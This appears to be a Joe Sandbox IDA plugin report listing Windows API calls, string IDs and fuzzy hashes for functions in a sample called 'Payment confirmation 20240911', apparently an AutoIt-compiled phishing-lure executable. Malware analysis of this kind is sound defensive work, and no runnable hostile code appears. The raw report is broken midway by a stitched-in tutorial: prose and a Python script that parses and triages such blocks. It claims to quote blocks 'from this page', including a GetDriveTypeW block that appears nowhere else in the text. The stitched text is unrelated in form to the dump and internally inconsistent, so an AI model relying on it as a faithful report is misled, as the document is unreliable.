                                          • API String ID: 3964851224-45149045
                                          • Opcode ID: 5680860c50dea0379d9f44af1c038464cc6cc263edaa2b15a898566a02ad6e60
                                          • Instruction ID: 2236c9dcd3e4a175255e4e2792ff0da7b711fc18b8db601c118d73a65ca45a6e
                                          • Opcode Fuzzy Hash: 5680860c50dea0379d9f44af1c038464cc6cc263edaa2b15a898566a02ad6e60
                                          • Instruction Fuzzy Hash: 3CC1E974214206CFCB08EF18C550A7DB7D6BFA565CF04485CE9865B3A5CB31E90BCB82
                                          APIs
                                          • SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 0134B5C0
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0134B5D1
                                          • CharNextW.USER32(0000014E), ref: 0134B600
                                          • SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 0134B641
                                          • SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 0134B657
                                          • SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 0134B668
                                          • SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 0134B685
                                          • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 0134B6D7
                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0134B6ED
                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0134B71E
                                          • _memset.LIBCMT ref: 0134B743
                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0134B78C
                                          • _memset.LIBCMT ref: 0134B7EB
                                          • SendMessageW.USER32 ref: 0134B815
                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0134B86D
                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0134B91A
                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0134B93C
                                          • GetMenuItemInfoW.USER32 ref: 0134B986
                                          • SetMenuItemInfoW.USER32 ref: 0134B9B3
                                          • DrawMenuBar.USER32(?), ref: 0134B9C2
                                          • SetWindowTextW.USER32(?,0000014E,?,?,?,?,?), ref: 0134B9EA
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                          • String ID: 0$`"u
                                          • API String ID: 1073566785-2270789441
                                          • Opcode ID: e52a13072acc241383d7893152059c4b3204c3dc465b8db5d59baf4f276ad2a0
                                          • Instruction ID: 81d301d36564c5d034ec38d1fae52e28ef3c6cbecbb63a8fefd75795bd24f5e7
                                          • Opcode Fuzzy Hash: e52a13072acc241383d7893152059c4b3204c3dc465b8db5d59baf4f276ad2a0
                                          • Instruction Fuzzy Hash: D3E16F75900219ABEF219F99CC84AEEBFFCEF05768F008155FA15AA194DB70DA40CF60
                                          APIs
                                          • GetSysColor.USER32(00000012,00000000,?,?,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?), ref: 0134D3BE
                                          • SetTextColor.GDI32(?,?), ref: 0134D3C2
                                          • GetSysColorBrush.USER32 ref: 0134D3D8
                                          • GetSysColor.USER32(0000000F,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D3E3
                                          • CreateSolidBrush.GDI32(?), ref: 0134D3E8
                                          • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D400
                                          • CreatePen.GDI32(00000000,00000001,00743C00), ref: 0134D40E
                                          • SelectObject.GDI32(?,00000000), ref: 0134D41F
                                          • SetBkColor.GDI32(?,00000000), ref: 0134D428
                                          • SelectObject.GDI32(?,?), ref: 0134D435
                                          • InflateRect.USER32 ref: 0134D454
                                          • RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 0134D46B
                                          • GetWindowLongW.USER32(00000000,000000F0), ref: 0134D480
                                          • SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 0134D4A8
                                          • GetWindowTextW.USER32(00000000,00000000,00000001,?,?,?,?,?,?,?,0134D0B5,?,?,00000000,?,?), ref: 0134D4CF
                                          • InflateRect.USER32 ref: 0134D4ED
                                          • DrawFocusRect.USER32 ref: 0134D4F8
                                          • GetSysColor.USER32(00000011,?,?,?,?,?,?,?,0134D0B5), ref: 0134D506
                                          • SetTextColor.GDI32(?,00000000), ref: 0134D50E
                                          • DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 0134D522
                                          • SelectObject.GDI32(?,0134D0B5), ref: 0134D539
                                          • DeleteObject.GDI32(?), ref: 0134D544
                                          • SelectObject.GDI32(?,?), ref: 0134D54A
                                          • DeleteObject.GDI32(?), ref: 0134D54F
                                          • SetTextColor.GDI32(?,?), ref: 0134D555
                                          • SetBkColor.GDI32(?,?), ref: 0134D55F
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
                                          • String ID:
                                          • API String ID: 1996641542-0
                                          • Opcode ID: 02e0f9766f18424f5d8f35264dc5deeb00fe044612e4c12b7cc24c175635e2b2
                                          • Instruction ID: 4001866bd77199a739a1c331ad130308d4109303c1aeaeea05e7bcabf3fdb220
                                          • Opcode Fuzzy Hash: 02e0f9766f18424f5d8f35264dc5deeb00fe044612e4c12b7cc24c175635e2b2
                                          • Instruction Fuzzy Hash: 23514C71A00208EFDF219FE9DC48EAE7BB9EB08324F118515FA55AB2A5D771A940CB50
                                          APIs
                                          • GetCursorPos.USER32(?), ref: 01347587
                                          • GetDesktopWindow.USER32 ref: 0134759C
                                          • GetWindowRect.USER32(00000000), ref: 013475A3
                                          • GetWindowLongW.USER32(?,000000F0), ref: 01347605
                                          • DestroyWindow.USER32 ref: 01347631
                                          • CreateWindowExW.USER32 ref: 0134765A
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 01347678
                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0134769E
                                          • SendMessageW.USER32(?,00000421,?,?), ref: 013476B3
                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 013476C6
                                          • IsWindowVisible.USER32(?), ref: 013476E6
                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 01347701
                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 01347715
                                          • GetWindowRect.USER32(?,?), ref: 0134772D
                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 01347753
                                          • GetMonitorInfoW.USER32 ref: 0134776D
                                          • CopyRect.USER32(?,?), ref: 01347784
                                          • SendMessageW.USER32(?,00000412,00000000), ref: 013477EF
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                          • String ID: ($0$tooltips_class32
                                          • API String ID: 698492251-4156429822
                                          • Opcode ID: b5c952150e6afcb6ee26677b86b33a720bc6089e3cdb0d1e6f8a0ac5884ddcef
                                          • Instruction ID: cc46571419e9440b60ce752c59302d929c97e65494f7d6a2d83a0b038365e308
                                          • Opcode Fuzzy Hash: b5c952150e6afcb6ee26677b86b33a720bc6089e3cdb0d1e6f8a0ac5884ddcef
                                          • Instruction Fuzzy Hash: C3B1DF71604341AFDB14DF68C948B6ABFE9FF88324F40891CF589AB291DB75E804CB91
                                          APIs
                                          • GetFileVersionInfoSizeW.VERSION(?,?), ref: 013276ED
                                          • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 01327713
                                          • _wcscpy.LIBCMT ref: 01327741
                                          • _wcscmp.LIBCMT ref: 0132774C
                                          • _wcscat.LIBCMT ref: 01327762
                                          • _wcsstr.LIBCMT ref: 0132776D
                                          • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 01327789
                                          • _wcscat.LIBCMT ref: 013277D2
                                          • _wcscat.LIBCMT ref: 013277D9
                                          • _wcsncpy.LIBCMT ref: 01327804
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                          • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                          • API String ID: 699586101-1459072770
                                          • Opcode ID: 9ddd2e4d555d14f8be02c64101f3b67311d11fac15290e49288ae097ec656237
                                          • Instruction ID: ee7fb5657e0df3b2b8d021afbae05834cc7a5aafcad79494ad651c5432e6d762
                                          • Opcode Fuzzy Hash: 9ddd2e4d555d14f8be02c64101f3b67311d11fac15290e49288ae097ec656237
                                          • Instruction Fuzzy Hash: 1A410971A002167AEB06BBBD8C56EBF7BECEF2571CF000059F504A61D1EB74DA0197A1
                                          APIs
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000,?,00000000,?,?,?,?,00000000), ref: 012FA839
                                          • GetSystemMetrics.USER32(00000007,?,?,?,?,00000000), ref: 012FA841
                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000,?,00000000,?,?,?), ref: 012FA86C
                                          • GetSystemMetrics.USER32(00000008,?,?,?), ref: 012FA874
                                          • GetSystemMetrics.USER32(00000004,?,?,?), ref: 012FA899
                                          • SetRect.USER32 ref: 012FA8B6
                                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 012FA8C6
                                          • CreateWindowExW.USER32 ref: 012FA8F9
                                          • SetWindowLongW.USER32(00000000,000000EB,00000000,?,?,?), ref: 012FA90D
                                          • GetClientRect.USER32(00000000,000000FF,?,?,?), ref: 012FA92B
                                          • GetStockObject.GDI32(00000011), ref: 012FA947
                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 012FA952
                                            • Part of subcall function 012FB736: GetCursorPos.USER32(000000FF), ref: 012FB749
                                            • Part of subcall function 012FB736: ScreenToClient.USER32(00000000,000000FF), ref: 012FB766
                                            • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB78B
                                            • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB799
                                          • SetTimer.USER32(00000000,00000000,00000028,012FACEE), ref: 012FA979
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
• Associated: 00000000.00000002.350831871.00000000012E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000136D000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350843003.000000000138E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350852852.000000000139A000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.350855461.00000000013A4000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_12e0000_Payment confirmation 20240911.jbxd
                                          Similarity
                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                          • String ID: AutoIt v3 GUI
                                          • API String ID: 1458621304-248962490
                                          • Opcode ID: 332d69007588fc3c46cd1c889bf53ad24cb41c82ae6bbc90d9ab466754e0ccfd
                                          • Instruction ID: cdec79c50b4489a53da8602e52f917fde8b7be8b41f37387b763bf32acb9e2c9
                                          • Opcode Fuzzy Hash: 332d69007588fc3c46cd1c889bf53ad24cb41c82ae6bbc90d9ab466754e0ccfd
                                          • Instruction Fuzzy Hash: 00B1827561020AEFDB24DFA8C845FADBBB8FB08714F014229FB5AA7294D774D901CB50
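The per-function blocks above (APIs with module and call site, then the Similarity fields with `$`-separated API and string IDs and the fuzzy hashes) are regular enough to parse mechanically, which is how an analyst turns hundreds of them into a short list worth opening in the disassembler. The following Python is an added example, not Joe Sandbox's own code: it parses a constructed, abridged copy of three blocks from this page (the GetDriveTypeW, "AutoIt v3 GUI" and RegSetValueExW functions), records each API call with its arguments and subcall parent, and flags blocks by an assumed category table (registry write, drive enumeration, key-state polling, version query) and by string IDs that name the AutoIt v3 runtime. The category table and marker list are illustrative assumptions chosen to match the APIs on this page.

```python
"""Parse Joe Sandbox per-function "APIs / Similarity" blocks into records and
flag behaviours worth a second look. Added example; not Joe Sandbox code."""
import re
from dataclasses import dataclass, field

# Constructed sample: three blocks from this page, abridged, in the page's own layout.
SAMPLE_REPORT = r"""APIs
• SetErrorMode.KERNEL32(00000001), ref: 0132E45E
• GetDriveTypeW.KERNEL32(?,0137DC88,?,\\.\,0137DBF0), ref: 0132E54B
• SetErrorMode.KERNEL32(00000000,0137DC88,?,\\.\,0137DBF0), ref: 0132E6B1
Strings
Memory Dump Source
• Source File: 00000000.00000002.350834182.00000000012E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 012E0000, based on PE: true
Similarity
• API ID: ErrorMode$DriveType
• String ID: 1394$ATA$CDROM$Fixed$Network$Removable$USB$Unknown$\\.\$iSCSI
• API String ID: 2907320926-4222207086
• Instruction Fuzzy Hash: A651F470218716EBCB20FF2AD89683AB7D4BB5462CF50893DE44A9B750E730DD49CB42
APIs
• SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 012FA839
• CreateWindowExW.USER32 ref: 012FA8F9
  • Part of subcall function 012FB736: GetAsyncKeyState.USER32 ref: 012FB78B
• SetTimer.USER32(00000000,00000000,00000028,012FACEE), ref: 012FA979
Strings
Similarity
• API ID: System$MetricsRectWindow$AsyncClientInfoParametersState
• String ID: AutoIt v3 GUI
• API String ID: 1458621304-248962490
APIs
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01343626
• RegCreateKeyExW.ADVAPI32(?,?,00000000,0137DBF0,00000000,?,00000000,?,?), ref: 01343694
• RegSetValueExW.ADVAPI32 ref: 01343765
• RegCloseKey.ADVAPI32(00000000), ref: 01343A92
Strings
Similarity
• API ID: Close$ConnectCreateRegistryValue
• String ID: REG_BINARY$REG_DWORD$REG_SZ
"""

SECTIONS = {"APIs", "Strings", "Memory Dump Source", "Joe Sandbox IDA Plugin", "Similarity"}

# "• Name.MODULE(args), ref: ADDR", optionally prefixed "Part of subcall function X:".
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>\w+)\.(?P<mod>[A-Z0-9]+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$"
)
KV_LINE = re.compile(r"^\s*•\s*(?P<key>[A-Za-z ]+?):\s*(?P<val>.*?)\s*$")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: str
    subcall_of: str = None  # address of the subcall function, if the call is indirect

@dataclass
class FunctionBlock:
    calls: list = field(default_factory=list)
    similarity: dict = field(default_factory=dict)
    source_file: str = None

    def _ids(self, key):
        return [p for p in self.similarity.get(key, "").split("$") if p]

    @property
    def api_ids(self):
        return self._ids("API ID")

    @property
    def string_ids(self):
        return self._ids("String ID")

def parse_report(text):
    """Split the report on 'APIs' headings and fill one FunctionBlock per function."""
    blocks, section, cur = [], None, None
    for line in text.splitlines():
        s = line.strip()
        if s in SECTIONS:
            if s == "APIs":
                cur = FunctionBlock()
                blocks.append(cur)
            section = s
            continue
        if cur is None:
            continue
        if section == "APIs":
            m = API_LINE.match(line)
            if m:
                args = m["args"].split(",") if m["args"] is not None else []
                cur.calls.append(ApiCall(m["name"], m["mod"], args, m["ref"], m["sub"]))
        elif section in ("Memory Dump Source", "Similarity"):
            m = KV_LINE.match(line)
            if m and section == "Similarity":
                cur.similarity[m["key"]] = m["val"]
            elif m and m["key"] == "Source File":
                cur.source_file = m["val"]
    return blocks

# Assumed category table for triage, chosen to match the APIs seen on this page;
# it is not Joe Sandbox's taxonomy.
CATEGORIES = {
    "registry_write": {"RegSetValueExW", "RegCreateKeyExW"},
    "drive_enum": {"GetDriveTypeW"},
    "input_capture": {"GetAsyncKeyState"},
    "version_query": {"GetFileVersionInfoW", "VerQueryValueW"},
}
# Strings that identify the AutoIt v3 runtime (assumed marker list).
AUTOIT_MARKERS = ("AutoIt v3", "#OnAutoItStartRegister", "#requireadmin", "#notrayicon")

def triage(blocks):
    """One summary dict per block: first call site, matched categories, AutoIt markers, fuzzy hash."""
    out = []
    for b in blocks:
        names = {c.name for c in b.calls}
        cats = sorted(k for k, apis in CATEGORIES.items() if names & apis)
        markers = [s for s in b.string_ids if any(m in s for m in AUTOIT_MARKERS)]
        out.append({"first_ref": b.calls[0].ref if b.calls else None,
                    "categories": cats, "autoit_markers": markers,
                    "fuzzy": b.similarity.get("Instruction Fuzzy Hash")})
    return out

if __name__ == "__main__":
    for row in triage(parse_report(SAMPLE_REPORT)):
        print(row)
```

Run against a full report export, the `autoit_markers` column separates the AutoIt runtime's own GUI, registry and drive helpers (which every compiled AutoIt script carries) from the functions that actually belong to the embedded payload, so the fuzzy hashes of the latter can be compared across samples instead of matching on interpreter code.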
                                          APIs
                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 01343626
                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0137DBF0,00000000,?,00000000,?,?), ref: 01343694
                                          • RegCloseKey.ADVAPI32(00000000), ref: 013436DC
                                          • RegSetValueExW.ADVAPI32 ref: 01343765
                                          • RegCloseKey.ADVAPI32(?), ref: 01343A85
                                          • RegCloseKey.ADVAPI32(00000000), ref: 01343A92
                                          Strings
                                          Similarity
                                          • API ID: Close$ConnectCreateRegistryValue
                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                          • API String ID: 536824911-966354055
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 01346A52
                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 01346B12
                                          Strings
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                          • API String ID: 3974292440-719923060
                                          APIs
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0131DD87
                                          • __swprintf.LIBCMT ref: 0131DE28
                                          • _wcscmp.LIBCMT ref: 0131DE3B
                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0131DE90
                                          • _wcscmp.LIBCMT ref: 0131DECC
                                          • GetClassNameW.USER32(?,?,00000400), ref: 0131DF03
                                          • GetDlgCtrlID.USER32 ref: 0131DF55
                                          • GetWindowRect.USER32(?,?), ref: 0131DF8B
                                          • GetParent.USER32(?), ref: 0131DFA9
                                          • ScreenToClient.USER32(00000000), ref: 0131DFB0
                                          • GetClassNameW.USER32(?,?,00000100), ref: 0131E02A
                                          • _wcscmp.LIBCMT ref: 0131E03E
                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0131E064
                                          • _wcscmp.LIBCMT ref: 0131E078
                                          Strings
                                          Similarity
                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                          • String ID: %s%u
                                          • API String ID: 3119225716-679674701
                                          APIs
                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0131E6E1
                                          • _wcscmp.LIBCMT ref: 0131E6F2
                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0131E71A
                                          • CharUpperBuffW.USER32(?,00000000), ref: 0131E737
                                          • _wcscmp.LIBCMT ref: 0131E755
                                          • _wcsstr.LIBCMT ref: 0131E766
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0131E79E
                                          • _wcscmp.LIBCMT ref: 0131E7AE
                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0131E7D5
                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0131E81E
                                          • _wcscmp.LIBCMT ref: 0131E82E
                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0131E856
                                          • GetWindowRect.USER32(00000004,?), ref: 0131E8BF
                                          Strings
                                          Similarity
                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                          • String ID: @$ThumbnailClass
                                          • API String ID: 1788623398-1539354611
                                          APIs
                                          • _memset.LIBCMT ref: 0134CD0B
                                          • DestroyWindow.USER32 ref: 0134CD83
                                            • Part of subcall function 012E7E53: _memmove.LIBCMT ref: 012E7EB9
                                          • CreateWindowExW.USER32 ref: 0134CE04
                                          • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0134CE26
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0134CE35
                                          • DestroyWindow.USER32 ref: 0134CE52
                                          • CreateWindowExW.USER32 ref: 0134CE85
                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0134CEA4
                                          • GetDesktopWindow.USER32 ref: 0134CEB9
                                          • GetWindowRect.USER32(00000000), ref: 0134CEC0
                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0134CED2
                                          • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0134CEEA
                                            • Part of subcall function 012FB155: GetWindowLongW.USER32(?,000000EB), ref: 012FB166
                                          Strings
                                          Similarity
                                          • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                          • String ID: 0$`"u$tooltips_class32
                                          • API String ID: 1297703922-2677254722
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • DragQueryPoint.SHELL32(?,?), ref: 0134F14B
                                            • Part of subcall function 0134D5EE: ClientToScreen.USER32(?,?), ref: 0134D617
                                            • Part of subcall function 0134D5EE: GetWindowRect.USER32(?,?), ref: 0134D68D
                                            • Part of subcall function 0134D5EE: PtInRect.USER32(?,?,0134EB2C), ref: 0134D69D
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0134F1B4
                                          • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0134F1BF
                                          • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0134F1E2
                                          • _wcscat.LIBCMT ref: 0134F212
                                          • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0134F229
                                          • SendMessageW.USER32(?,000000B0,?,?), ref: 0134F242
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0134F259
                                          • SendMessageW.USER32(?,000000B1,?,?), ref: 0134F27B
                                          • DragFinish.SHELL32(?), ref: 0134F282
                                          • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0134F36D
                                          Strings
                                          Similarity
                                          • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                          • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$`"u
                                          • API String ID: 169749273-1427848159
                                          APIs
                                          Strings
                                          Similarity
                                          • API ID: __wcsnicmp
                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                          • API String ID: 1038674560-1810252412
                                          APIs
                                          • LoadIconW.USER32 ref: 0131F8AB
                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0131F8BD
                                          • SetWindowTextW.USER32(?,?), ref: 0131F8D4
                                          • GetDlgItem.USER32(?,000003EA), ref: 0131F8E9
                                          • SetWindowTextW.USER32(00000000,?), ref: 0131F8EF
                                          • GetDlgItem.USER32(?,000003E9), ref: 0131F8FF
                                          • SetWindowTextW.USER32(00000000,?), ref: 0131F905
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0131F926
                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0131F940
                                          • GetWindowRect.USER32(?,?), ref: 0131F949
                                          • SetWindowTextW.USER32(?,?), ref: 0131F9B4
                                          • GetDesktopWindow.USER32 ref: 0131F9BA
                                          • GetWindowRect.USER32(00000000), ref: 0131F9C1
                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0131FA0D
                                          • GetClientRect.USER32(?,?), ref: 0131FA1A
                                          • PostMessageW.USER32 ref: 0131FA3F
                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0131FA6A
                                          Similarity
                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                          • String ID:
                                          • API String ID: 3869813825-0
                                          APIs
                                          • VariantInit.OLEAUT32(00000000), ref: 0132B46D
                                          • VariantCopy.OLEAUT32(?,?), ref: 0132B476
                                          • VariantClear.OLEAUT32(?), ref: 0132B482
                                          • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 0132B561
                                          • __swprintf.LIBCMT ref: 0132B591
                                          • VarR8FromDec.OLEAUT32(?,?), ref: 0132B5BD
                                          • VariantInit.OLEAUT32(?), ref: 0132B63F
                                          • SysFreeString.OLEAUT32(00000016), ref: 0132B6D1
                                          • VariantClear.OLEAUT32(?), ref: 0132B727
                                          • VariantClear.OLEAUT32(?), ref: 0132B736
                                          • VariantInit.OLEAUT32(00000000), ref: 0132B772
                                          Strings
                                          Similarity
                                          • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                          • String ID: %4d%02d%02d%02d%02d%02d$Default
                                          • API String ID: 3730832054-3931177956
                                          APIs
                                          • CharUpperBuffW.USER32(?,?), ref: 01346FF9
                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 01347044
                                          Strings
                                          Similarity
                                          • API ID: BuffCharMessageSendUpper
                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                          • API String ID: 3974292440-4258414348
                                          APIs
                                            • Part of subcall function 012FAF7D: GetWindowLongW.USER32(?,000000EB), ref: 012FAF8E
                                          • PostMessageW.USER32 ref: 0134ED0C
                                          • GetFocus.USER32(?,?,?,?), ref: 0134ED1C
                                          • GetDlgCtrlID.USER32 ref: 0134ED27
                                          • _memset.LIBCMT ref: 0134EE52
                                          • GetMenuItemInfoW.USER32 ref: 0134EE7D
                                          • GetMenuItemCount.USER32(00000000), ref: 0134EE9D
                                          • GetMenuItemID.USER32(?,00000000), ref: 0134EEB0
                                          • GetMenuItemInfoW.USER32 ref: 0134EEE4
                                          • GetMenuItemInfoW.USER32 ref: 0134EF2C
                                          • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0134EF64
                                          • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0134EF99
                                          Strings
                                          Similarity
                                          • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                          • String ID: 0$`"u
                                          • API String ID: 1296962147-2270789441
